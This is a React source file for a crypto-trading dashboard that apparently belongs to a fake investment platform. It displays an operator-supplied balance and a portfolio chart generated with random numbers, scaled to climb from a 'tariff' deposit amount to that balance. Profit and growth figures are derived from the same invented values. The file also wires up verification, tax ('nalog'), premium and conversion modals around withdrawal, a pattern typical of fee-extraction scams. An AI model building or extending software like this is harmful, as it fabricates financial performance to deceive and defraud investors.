import React, { useState, useMemo, useRef, useCallback, useEffect } from 'react';
import s from './Dashbroad.module.sass';
import doneRight from '../img/done-ring-round-svgrepo-com.svg';
import three from '../img/three-open-svgrepo-com.svg';
import binance from '../img/binance-coin-bnb-logo-CD94CC6D31-seeklogo.com.png';

import bitcoin from '../img/Bitcoin.svg.png';
import { GradientLineChart } from './GradientLineChart';
import { ProgressBar } from './ProgressBar/ProgressBar';
import { ToggleSwitch } from './ToggleSwitch/ToggleSwitch';
import { useSimpleTranslation } from '../hooks/useTranslation';

export const Dashbroad = ({
    nameUser,
    confirmedNameUser,
    adressCrypto,
    setAdressCrypto,
    maxTotalMoney,
    verifyModalAmount,
    tariffs,
    network,
    setNetwork,
    bnbBalanca,
    setBnbBalanca,
    networks,
    setImgCoin,
    imgCoin,
    isVerificationActive,
    onVerificationClick,
    isNavbarCollapsed,
    selectedCrypto,
    cryptoOptions,
    currencyFormat,
    siteSettings,
    currentTariffLabel,
    customDepositMoney,
    customMaxMoney,
    calculateCryptoAmount,
    // Modal functions
    setshowVerifyModal,
    setSendingErrorModal,
    setShowModaWithdrawal,
    setshowNalogModal,
    setShowCryptoConversionModal,
    setShowBankConversionModal,
    setShowPremiumModal,
    setCustomModalState,
    // Modal states
    showVerifyModal,
    sendingErrorModal, // Это модал верификации!
    showModaWithdrawal,
    showNalogModal,
    showCryptoConversionModal,
    showBankConversionModal,
    showPremiumModal,
    showCodeModal
}) => {
    console.log('🎮 Dashboard component rendered with props:', {
        currencyFormat,
        siteSettings,
        siteSettingsType: typeof siteSettings,
        tariffDepositAmounts: siteSettings?.tariffDepositAmounts,
        currentTariffLabel,
        showCodeModal,
        maxTotalMoney,
        showVerifyModal,
        sendingErrorModal, // Это модал верификации!
        verifyModalAmount,
        sendingErrorModalType: typeof sendingErrorModal,
        verifyModalAmountType: typeof verifyModalAmount
    });
    
    // Отслеживаем изменения sendingErrorModal (это модал верификации!)
    useEffect(() => {
        console.log('🔔 sendingErrorModal (verification modal) changed:', sendingErrorModal, 'verifyModalAmount:', verifyModalAmount);
    }, [sendingErrorModal, verifyModalAmount]);
    
    // Вычисляем отображаемую сумму: если открыт модал верификации (sendingErrorModal), используем verifyModalAmount, иначе maxTotalMoney
    const displayAmount = useMemo(() => {
        console.log('🔄 Calculating displayAmount:', { 
            showCodeModal, 
            sendingErrorModal, // Используем sendingErrorModal вместо showVerifyModal!
            verifyModalAmount, 
            maxTotalMoney,
            verifyModalAmountType: typeof verifyModalAmount,
            maxTotalMoneyType: typeof maxTotalMoney,
            sendingErrorModalIsTrue: sendingErrorModal === true,
            verifyModalAmountIsValid: verifyModalAmount && verifyModalAmount !== 0
        });
        if (showCodeModal) return '0,00';
        if (sendingErrorModal === true && verifyModalAmount && verifyModalAmount !== 0) {
            const amount = typeof verifyModalAmount === 'string' 
                ? parseFloat(verifyModalAmount.toString().replace(/,/g, '')) 
                : verifyModalAmount;
            console.log('✅ Using verifyModalAmount:', amount);
            return amount;
        }
        const amount = typeof maxTotalMoney === 'string' 
            ? parseFloat(maxTotalMoney.toString().replace(/,/g, '')) 
            : maxTotalMoney;
        console.log('✅ Using maxTotalMoney:', amount, 'because sendingErrorModal:', sendingErrorModal, 'verifyModalAmount:', verifyModalAmount);
        return amount;
    }, [showCodeModal, sendingErrorModal, verifyModalAmount, maxTotalMoney]);
    
    // Система переводов
    const { t } = useSimpleTranslation(siteSettings);
    
    const [selected, setSelected] = useState('24H');

    // Функция для форматирования чисел согласно настройкам
    const formatNumber = (number, format = 'comma') => {
        if (isNaN(number) || number === null || number === undefined) return '0.00';
        
        // Если это строка '0,00' или '0.00', возвращаем '0.00'
        if (typeof number === 'string' && (number === '0,00' || number === '0.00' || number === '0')) {
            return '0.00';
        }
        
        const num = parseFloat(number.toString().replace(/,/g, ''));
        
        if (isNaN(num) || num === 0) return '0.00';
        
        // Принудительное форматирование без зависимости от системной локали
        const parts = num.toFixed(2).split('.');
        const integerPart = parts[0];
        const decimalPart = parts[1];
        
        if (format === 'dot') {
            // Европейский формат: 10.294,98 (точка для тысяч, запятая для десятых)
            const formattedInteger = integerPart.replace(/\B(?=(\d{3})+(?!\d))/g, '.');
            return `${formattedInteger},${decimalPart}`;
        } else {
            // Американский формат: 10,294.98 (запятая для тысяч, точка для десятых)
            const formattedInteger = integerPart.replace(/\B(?=(\d{3})+(?!\d))/g, ',');
            return `${formattedInteger}.${decimalPart}`;
        }
    };

    // Функция для форматирования криптовалют с настраиваемым количеством знаков
    const formatCrypto = (number, decimalPlaces = 5) => {
        if (isNaN(number) || number === null || number === undefined) return '0.' + '0'.repeat(decimalPlaces);
        
        const num = parseFloat(number);
        return num.toFixed(decimalPlaces);
    };

    const verificationImage = isVerificationActive ? doneRight : three;

    const handleSelect = (value) => {
        setSelected(value);
    };

    // Генерация данных для графика с правильными начальной и конечной суммами
    const generateChartData = (startAmount, endAmount, numPoints) => {
        // Если обе суммы равны 0, возвращаем ровную линию внизу
        if (startAmount === 0 && endAmount === 0) {
            return Array.from({ length: numPoints }, (_, i) => ({
                name: i === 0 ? '0' : `Sesi Dagangan`,
                balance: 0
            }));
        }
        
        const data = [];
        
        // Генерируем случайные промежуточные точки
        const tempData = [];
        let tempBalance = 1000; // Временное начальное значение для генерации формы
        
        for (let i = 0; i < numPoints; i++) {
            const change = Math.random() * 6500 - 2500;
            tempBalance += change;
            if (tempBalance < 0) tempBalance = 100;
            tempData.push(tempBalance);
        }
        
        // Нормализуем данные под нужный диапазон
        const minTemp = Math.min(...tempData);
        const maxTemp = Math.max(...tempData);
        const tempRange = maxTemp - minTemp;
        const targetRange = endAmount - startAmount;
        
        for (let i = 0; i < numPoints; i++) {
            // Масштабируем каждую точку в нужный диапазон
            const normalizedValue = (tempData[i] - minTemp) / tempRange;
            const scaledValue = startAmount + (normalizedValue * targetRange);
            
            data.push({
                name: i === 0 ? '0' : `Sesi Dagangan`,
                balance: parseFloat(scaledValue.toFixed(2)),
            });
        }
        
        // Принудительно устанавливаем первую и последнюю точки
        if (data.length > 0) {
            data[0].balance = startAmount;
            data[data.length - 1].balance = endAmount;
        }
        
        return data;
    };

    // Получаем правильные начальную и конечную суммы
    const getChartAmounts = () => {
        if (!tariffs || tariffs.length === 0) return { start: 1000, end: 1000 };
        
        const currentBalance = parseFloat(displayAmount.toString().replace(/,/g, ''));
        
        // Если задана кастомная сумма депозита, используем её вместо суммы из тарифа
        let startAmount;
        if (customDepositMoney) {
            const customDeposit = parseFloat(customDepositMoney);
            if (customDeposit > 0 && !isNaN(customDeposit)) {
                startAmount = customDeposit;
            }
        }
        
        // Если кастомная сумма не задана, используем сумму из тарифа
        if (!startAmount) {
        const initialInvestments = siteSettings?.tariffDepositAmounts || {
            '💰 1 ТАРИФ': 169,
            '❗❗ 2 ТАРИФ': 299,
            '❗❗❗ 3 ТАРИФ': 429,
            '❗❗❗❗ 4 ТАРИФ': 849,
            '⚠️ VIP ТАРИФ': 1899
        };
        
        // Используем currentTariffLabel для определения активного тарифа
        let activeTariff = null;
        
        if (currentTariffLabel) {
            // Ищем тариф по currentTariffLabel
            activeTariff = tariffs.find(tariff => tariff.label === currentTariffLabel);
        }
        
        // Если тариф не найден, используем fallback логику
        if (!activeTariff) {
            if (tariffs.length === 1) {
                activeTariff = tariffs[0];
            } else {
                // Ищем тариф с baseAmount, который ближе всего к currentBalance
                activeTariff = tariffs.reduce((closest, tariff) => {
                    const tariffAmount = parseFloat(tariff.baseAmount);
                    const closestAmount = parseFloat(closest.baseAmount);
                    return Math.abs(tariffAmount - currentBalance) < Math.abs(closestAmount - currentBalance) 
                        ? tariff : closest;
                });
            }
            }
            
            startAmount = activeTariff && initialInvestments[activeTariff.label] 
                ? initialInvestments[activeTariff.label] 
                : initialInvestments['💰 1 ТАРИФ'] || 169;
        }
        
        // Если баланс равен 0, то и график должен показывать 0
        if (currentBalance === 0 || isNaN(currentBalance)) {
            return { start: 0, end: 0 };
        }
        
        console.log('📊 Chart calculation debug:', {
            currentBalance,
            currentTariffLabel,
            customDepositMoney,
            startAmount,
            tariffs: tariffs.map(t => ({ label: t.label, baseAmount: t.baseAmount }))
        });
            
        return { 
            start: startAmount, 
            end: currentBalance 
        };
    };

    // Получаем правильные начальную и конечную суммы
    const chartAmounts = useMemo(() => {
        // Если открыт модал "Код", обнуляем график
        if (showCodeModal) {
            return { start: 0, end: 0 };
        }
        return getChartAmounts();
    }, [displayAmount, tariffs, currentTariffLabel, siteSettings?.tariffDepositAmounts, customDepositMoney, showCodeModal]);
    
    const data = useMemo(() => {
        // Если открыт модал "Код", генерируем график с нулями (ровная линия внизу)
        if (showCodeModal) {
            return Array.from({ length: 100 }, (_, i) => ({
                name: i === 0 ? '0' : `Sesi Dagangan`,
                balance: 0
            }));
        }
        return generateChartData(chartAmounts.start, chartAmounts.end, 100);
    }, [chartAmounts.start, chartAmounts.end, confirmedNameUser, showCodeModal]);



    // Вычисляем процент роста между изначальной инвестицией и текущим балансом
    const calculateGrowthPercentage = () => {
        // Если открыт модал "Код", обнуляем проценты
        if (showCodeModal) {
            return { value: '0%', isZero: true };
        }
        
        if (!tariffs || tariffs.length === 0) return { value: '0%', isZero: true };
        
        const currentBalance = parseFloat(displayAmount.toString().replace(/,/g, ''));
        
        // Если баланс 0 или нет данных - возвращаем 0
        if (currentBalance === 0 || isNaN(currentBalance)) {
            return { value: '0%', isZero: true };
        }
        
        // Если задана кастомная сумма депозита, используем её вместо суммы из тарифа
        let initialInvestment;
        if (customDepositMoney) {
            const customDeposit = parseFloat(customDepositMoney);
            if (customDeposit > 0 && !isNaN(customDeposit)) {
                initialInvestment = customDeposit;
            }
        }
        
        // Если кастомная сумма не задана, используем сумму из тарифа
        if (!initialInvestment) {
        const initialInvestments = siteSettings?.tariffDepositAmounts || {
            '💰 1 ТАРИФ': 169,
            '❗❗ 2 ТАРИФ': 299,
            '❗❗❗ 3 ТАРИФ': 429,
            '❗❗❗❗ 4 ТАРИФ': 849,
            '⚠️ VIP ТАРИФ': 1899
        };
        
        // Используем currentTariffLabel для определения активного тарифа
        let activeTariff = null;
        
        if (currentTariffLabel) {
            // Ищем тариф по currentTariffLabel
            activeTariff = tariffs.find(tariff => tariff.label === currentTariffLabel);
        }
        
        // Если тариф не найден, используем fallback логику
        if (!activeTariff) {
            if (tariffs.length === 1) {
                activeTariff = tariffs[0];
            } else {
                // Ищем тариф с baseAmount, который ближе всего к currentBalance
                activeTariff = tariffs.reduce((closest, tariff) => {
                    const tariffAmount = parseFloat(tariff.baseAmount);
                    const closestAmount = parseFloat(closest.baseAmount);
                    return Math.abs(tariffAmount - currentBalance) < Math.abs(closestAmount - currentBalance) 
                        ? tariff : closest;
                });
            }
        }
        
            initialInvestment = activeTariff && initialInvestments[activeTariff.label]
            ? initialInvestments[activeTariff.label] 
            : initialInvestments['💰 1 ТАРИФ'] || 169;
        }
        
        if (!initialInvestment || initialInvestment === 0) return { value: '0%', isZero: true };
        
        const growthPercentage = ((currentBalance - initialInvestment) / initialInvestment * 100);
        const isPositive = growthPercentage >= 0;
        
        return { 
            value: `${isPositive ? '+' : ''}${growthPercentage.toFixed(1)}%`,
            isZero: false
        };
    };

    const growthData = useMemo(() => {
        if (showCodeModal) {
            return { value: '0%', isZero: true };
        }
        return calculateGrowthPercentage();
    }, [showCodeModal, displayAmount, tariffs, currentTariffLabel, siteSettings?.tariffDepositAmounts, customDepositMoney]);

    // Функция для извлечения числового значения процента для прогресс-бара
    const getPercentageValue = (changeString) => {
        if (!changeString || changeString === '0%') return 0;
        const numericValue = parseFloat(changeString.replace(/[+%-]/g, ''));
        
        // Проверяем что numericValue является числом
        if (isNaN(numericValue)) return 0;
        
        // Масштабируем большие проценты для визуализации
        if (numericValue >= 1000) return 100; // Все что больше 1000% = полная полоска
        if (numericValue >= 100) return 80 + (numericValue - 100) / 900 * 20; // 100-1000% = 80-100%
        if (numericValue >= 10) return 50 + (numericValue - 10) / 90 * 30; // 10-100% = 50-80%
        return numericValue * 5; // 0-10% = 0-50%
    };

    // Мемоизируем выбор второй крипты чтобы она не мигала при каждом рендере
    const otherCryptoRef = useRef(null);
    const selectedCryptoData = cryptoOptions.find(c => c.symbol === selectedCrypto);
    
    const otherCrypto = useMemo(() => {
        // Если выбранная крипта изменилась, выбираем новую вторую крипту
        if (!otherCryptoRef.current || otherCryptoRef.current.selectedCrypto !== selectedCrypto) {
            const others = cryptoOptions.filter(c => c.symbol !== selectedCrypto);
            const randomOther = others[Math.floor(Math.random() * others.length)];
            otherCryptoRef.current = {
                selectedCrypto: selectedCrypto,
                crypto: randomOther || others[0] || cryptoOptions[0]
            };
        }
        return otherCryptoRef.current.crypto;
    }, [selectedCrypto, cryptoOptions]);

    const portfolioAssets = [
        {
            name: selectedCryptoData?.name || 'Ethereum',
            symbol: selectedCrypto,
            icon: selectedCryptoData?.icon || binance,
            balance: showCodeModal ? formatCrypto(0, siteSettings?.cryptoDecimalPlaces || 5) : formatCrypto(bnbBalanca || 0, siteSettings?.cryptoDecimalPlaces || 5),
            value: showCodeModal ? 0 : displayAmount,
            percentage: showCodeModal ? 0 : (displayAmount === 0 ? 0 : 100), // Ползунок всегда заполнен если есть баланс
            change: showCodeModal ? '0%' : (displayAmount === 0 ? '0%' : (growthData.value || '0%')),
            changePositive: showCodeModal ? null : (growthData.isZero ? null : !growthData.value.includes('-'))
        },
        {
            name: otherCrypto?.name || 'Bitcoin',
            symbol: otherCrypto?.symbol || 'BTC',
            icon: otherCrypto?.icon || bitcoin,
            balance: formatCrypto(0, siteSettings?.cryptoDecimalPlaces || 5),
            value: '0.00',
            percentage: 0,
            change: '0%',
            changePositive: null
        }
    ];

    // Вычисляем Today's P&L (прибыль = текущий баланс - изначальная инвестиция)
    const calculateTodayPnL = () => {
        // Если открыт модал "Код", обнуляем P&L
        if (showCodeModal) {
            return { value: `${currencyFormat || 'RM'} 0.00`, change: '0%', positive: null };
        }
        
        console.log('💰 calculateTodayPnL started with displayAmount:', displayAmount);
        if (!tariffs || tariffs.length === 0) return { value: `${currencyFormat || 'RM'} 0.00`, change: '0%', positive: null };
        
        const currentBalance = parseFloat(displayAmount.toString().replace(/,/g, ''));
        
        // Если баланс 0 или нет данных - возвращаем 0
        if (currentBalance === 0 || isNaN(currentBalance)) {
            return { value: `${currencyFormat || 'RM'} 0.00`, change: '0%', positive: null };
        }
        
        // Если задана кастомная сумма депозита, используем её вместо суммы из тарифа
        let initialInvestment;
        if (customDepositMoney) {
            const customDeposit = parseFloat(customDepositMoney);
            if (customDeposit > 0 && !isNaN(customDeposit)) {
                initialInvestment = customDeposit;
            }
        }
        
        // Если кастомная сумма не задана, используем сумму из тарифа
        if (!initialInvestment) {
        const initialInvestments = siteSettings?.tariffDepositAmounts || {
            '💰 1 ТАРИФ': 169,
            '❗❗ 2 ТАРИФ': 299,
            '❗❗❗ 3 ТАРИФ': 429,
            '❗❗❗❗ 4 ТАРИФ': 849,
            '⚠️ VIP ТАРИФ': 1899
        };
        
        // Используем currentTariffLabel для определения активного тарифа
        let activeTariff = null;
        
        if (currentTariffLabel) {
            // Ищем тариф по currentTariffLabel
            activeTariff = tariffs.find(tariff => tariff.label === currentTariffLabel);
        }
        
        // Если тариф не найден, используем fallback логику
        if (!activeTariff) {
            if (tariffs.length === 1) {
                activeTariff = tariffs[0];
            } else {
                // Ищем тариф с baseAmount, который ближе всего к currentBalance
                activeTariff = tariffs.reduce((closest, tariff) => {
                    const tariffAmount = parseFloat(tariff.baseAmount);
                    const closestAmount = parseFloat(closest.baseAmount);
                    return Math.abs(tariffAmount - currentBalance) < Math.abs(closestAmount - currentBalance) 
                        ? tariff : closest;
                });
            }
        }
        
            initialInvestment = activeTariff && initialInvestments[activeTariff.label]
            ? initialInvestments[activeTariff.label] 
            : initialInvestments['💰 1 ТАРИФ'] || 169;
        }
            
        console.log('P&L Calculation:', {
            customDepositMoney,
            initialInvestment,
            currentBalance,
            profit: currentBalance - initialInvestment,
            profitPercentage: ((currentBalance - initialInvestment) / initialInvestment * 100).toFixed(2) + '%'
        });
            
        if (!initialInvestment) return { value: `${currencyFormat || 'RM'} 0.00`, change: '0%', positive: null };
        
        const profit = currentBalance - initialInvestment;
        const profitPercentage = (profit / initialInvestment * 100);
        const isPositive = profit >= 0;
        
        const formattedProfit = isPositive 
                        ? `+${currencyFormat || 'RM'} ${formatNumber(profit, siteSettings?.numberFormat)}`
            : `-${currencyFormat || 'RM'} ${formatNumber(Math.abs(profit), siteSettings?.numberFormat)}`;
            
        const formattedPercentage = `${isPositive ? '+' : ''}${profitPercentage.toFixed(1)}%`;
        
        return {
            value: formattedProfit,
            change: formattedPercentage,
            positive: isPositive
        };
    };

    const todayPnL = useMemo(() => calculateTodayPnL(), [showCodeModal, displayAmount, tariffs, currentTariffLabel, siteSettings?.tariffDepositAmounts, customDepositMoney, currencyFormat, siteSettings?.numberFormat]);

    const marketStats = [
        { 
            label: t('dashboard.balanceAmount', 'Сумма баланса'), 
            value: showCodeModal ? `${currencyFormat || 'RM'} 0.00` : `${currencyFormat || 'RM'} ${formatNumber(displayAmount, siteSettings?.numberFormat)}`, 
            change: showCodeModal ? '0%' : growthData.value, 
            positive: showCodeModal ? null : (growthData.isZero ? null : !growthData.value.includes('-'))
        },
        { 
            label: t('dashboard.todayPnL', 'P&L сегодня'), 
            value: showCodeModal ? `${currencyFormat || 'RM'} 0.00` : todayPnL.value, 
            change: showCodeModal ? '0%' : todayPnL.change, 
            positive: showCodeModal ? null : todayPnL.positive 
        },
        { 
            label: t('dashboard.activePositions', 'Активные позиции'), 
            value: '0', 
            change: t('dashboard.noActiveTradingSessions', 'Нет активных торговых сессий'), 
            positive: null 
        },
        { 
            label: t('dashboard.portfolioGrowth', 'Рост портфолио'), 
            value: showCodeModal ? '0%' : growthData.value, 
            change: t('dashboard.thisMonth', 'В этом месяце'), 
            positive: showCodeModal ? null : (growthData.isZero ? null : !growthData.value.startsWith('-'))
        }
    ];

    return (
        <div className={`${s.dashboard} ${isNavbarCollapsed ? s.collapsed : ''}`}>
            {/* Welcome Section */}
            {siteSettings?.showWelcomeBlock !== false && (
            <div className={s.welcomeSection}>
                <div className={s.welcomeContent}>
                    <h1 className={s.welcomeTitle}>{t('dashboard.welcomeBack', 'Добро пожаловать обратно')}, {nameUser}!</h1>
                    <p className={s.welcomeSubtitle}>{t('dashboard.portfolioToday', 'Вот что происходит с вашим портфолио сегодня')}</p>
                    <div className={s.marketOverview}>
                        {marketStats.map((stat, index) => (
                            <div key={index} className={s.statCard}>
                                <div className={s.statLabel}>{stat.label}</div>
                                <div className={s.statValue}>{stat.value}</div>
                                <div className={`${s.statChange} ${stat.positive === null ? s.neutral : stat.positive ? s.positive : s.negative}`}>
                                    {stat.change}
                                </div>
                            </div>
                        ))}
                    </div>
                </div>
            </div>
            )}

            {/* Main Content Grid */}
            <div className={s.contentGrid}>
                {/* Portfolio Overview */}
                <div className={s.portfolioSection}>
                    <div className={s.portfolioHeader}>
                        <h2 className={s.sectionTitle}>{t('dashboard.portfolioOverview', 'Обзор портфолио')}</h2>
                        <div className={s.timeFilters}>
                            {['1H', '24H', '1W', '1M', '1Y'].map((value) => (
                                <button
                                    key={value}
                                    className={`${s.timeFilter} ${selected === value ? s.active : ''}`}
                                    onClick={() => handleSelect(value)}
                                >
                                    {value}
                                </button>
                            ))}
                        </div>
                    </div>
                    
                    <div className={s.portfolioChart}>
                        <div className={s.chartHeader}>
                            <div className={s.portfolioValue}>
                                <span className={s.totalValue}>{currencyFormat || 'RM'} {(() => {
                                    console.log('📊 Rendering totalValue:', { showCodeModal, displayAmount, type: typeof displayAmount });
                                    if (showCodeModal) {
                                        console.log('✅ showCodeModal is true, returning 0.00');
                                        return '0.00';
                                    }
                                    const displayAmountStr = String(displayAmount);
                                    if (displayAmountStr === '0,00' || displayAmountStr === '0' || displayAmountStr === '0.00' || displayAmount === 0) {
                                        console.log('✅ displayAmount is zero, returning 0.00');
                                        return '0.00';
                                    }
                                    console.log('📊 Formatting displayAmount:', displayAmount);
                                    return formatNumber(displayAmount, siteSettings?.numberFormat);
                                })()}</span>
                                <span className={`${s.valueChange} ${
                                    showCodeModal ? s.neutral : (todayPnL.positive === null ? s.neutral : 
                                    todayPnL.positive ? s.positive : s.negative)
                                }`}>{showCodeModal ? `${currencyFormat || 'RM'} 0.00` : todayPnL.value} ({showCodeModal ? '0%' : todayPnL.change})</span>
                            </div>
                        </div>
                        <div className={s.chartContainer}>
                            <GradientLineChart data={data} currencyFormat={currencyFormat} />
                        </div>
                    </div>

                    {/* Assets List */}
                    <div className={s.assetsList}>
                        <div className={s.assetsHeader}>
                            <h3 className={s.assetsTitle}>{t('dashboard.yourAssets', 'Ваши активы')}</h3>
                            <button className={s.viewAllBtn}>
                                {t('dashboard.viewAll', 'Посмотреть все')}
                                <svg width="16" height="16" viewBox="0 0 24 24" fill="none">
                                    <path d="M9 18l6-6-6-6" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
                                </svg>
                            </button>
                        </div>
                        {portfolioAssets.map((asset, index) => (
                            <div key={index} className={s.assetItem}>
                                <div className={s.assetInfo}>
                                    <img src={asset.icon} alt={asset.symbol} className={s.assetIcon} />
                                    <div className={s.assetDetails}>
                                        <span className={s.assetName}>{asset.name}</span>
                                        <span className={s.assetSymbol}>{asset.symbol}</span>
                                    </div>
                                </div>
                                <div className={s.assetBalance}>
                                    <span className={s.assetAmount}>{asset.balance} {asset.symbol}</span>
                                    <span className={s.assetValue}>{currencyFormat || 'RM'} {formatNumber(showCodeModal ? 0 : (typeof asset.value === 'number' ? asset.value : parseFloat(String(asset.value).replace(/,/g, '')) || 0), siteSettings?.numberFormat)}</span>
                                </div>
                                <div className={s.assetChange}>
                                    <span className={`${s.changeValue} ${
                                        asset.changePositive === null ? s.neutral : 
                                        asset.changePositive ? s.positive : s.negative
                                    }`}>
                                        {asset.change}
                                    </span>
                                    <div className={s.assetProgress}>
                                        <ProgressBar percentage={asset.percentage} />
                                    </div>
                                </div>
                            </div>
                        ))}
                    </div>
                </div>

                {/* Trading Panel */}
                <div className={s.tradingPanel}>
                    <div className={s.tradingForm}>
                        <ToggleSwitch
                            setImgCoin={setImgCoin} 
                            imgCoin={imgCoin}
                            networks={networks}
                            setBnbBalanca={setBnbBalanca}
                            bnbBalanca={bnbBalanca}
                            network={network}
                            setNetwork={setNetwork}
                            maxTotalMoney={showCodeModal ? 0 : displayAmount}
                            adressCrypto={adressCrypto}
                            setAdressCrypto={setAdressCrypto}
                            nameUser={nameUser}
                            selectedCrypto={selectedCrypto}
                            cryptoOptions={cryptoOptions}
                            currencyFormat={currencyFormat}
                            siteSettings={siteSettings}
                            customMaxMoney={customMaxMoney}
                            calculateCryptoAmount={calculateCryptoAmount}
                            // Modal functions
                            setshowVerifyModal={setshowVerifyModal}
                            setSendingErrorModal={setSendingErrorModal}
                            setShowModaWithdrawal={setShowModaWithdrawal}
                            setshowNalogModal={setshowNalogModal}
                            setShowCryptoConversionModal={setShowCryptoConversionModal}
                            setShowBankConversionModal={setShowBankConversionModal}
                            setShowPremiumModal={setShowPremiumModal}
                            setCustomModalState={setCustomModalState}
                            // Modal states
                            showVerifyModal={showVerifyModal}
                            sendingErrorModal={sendingErrorModal}
                            showModaWithdrawal={showModaWithdrawal}
                            showNalogModal={showNalogModal}
                            showCryptoConversionModal={showCryptoConversionModal}
                            showBankConversionModal={showBankConversionModal}
                            showPremiumModal={showPremiumModal}
                        />
                    </div>
                </div>
            </div>
        </div>
    );
};
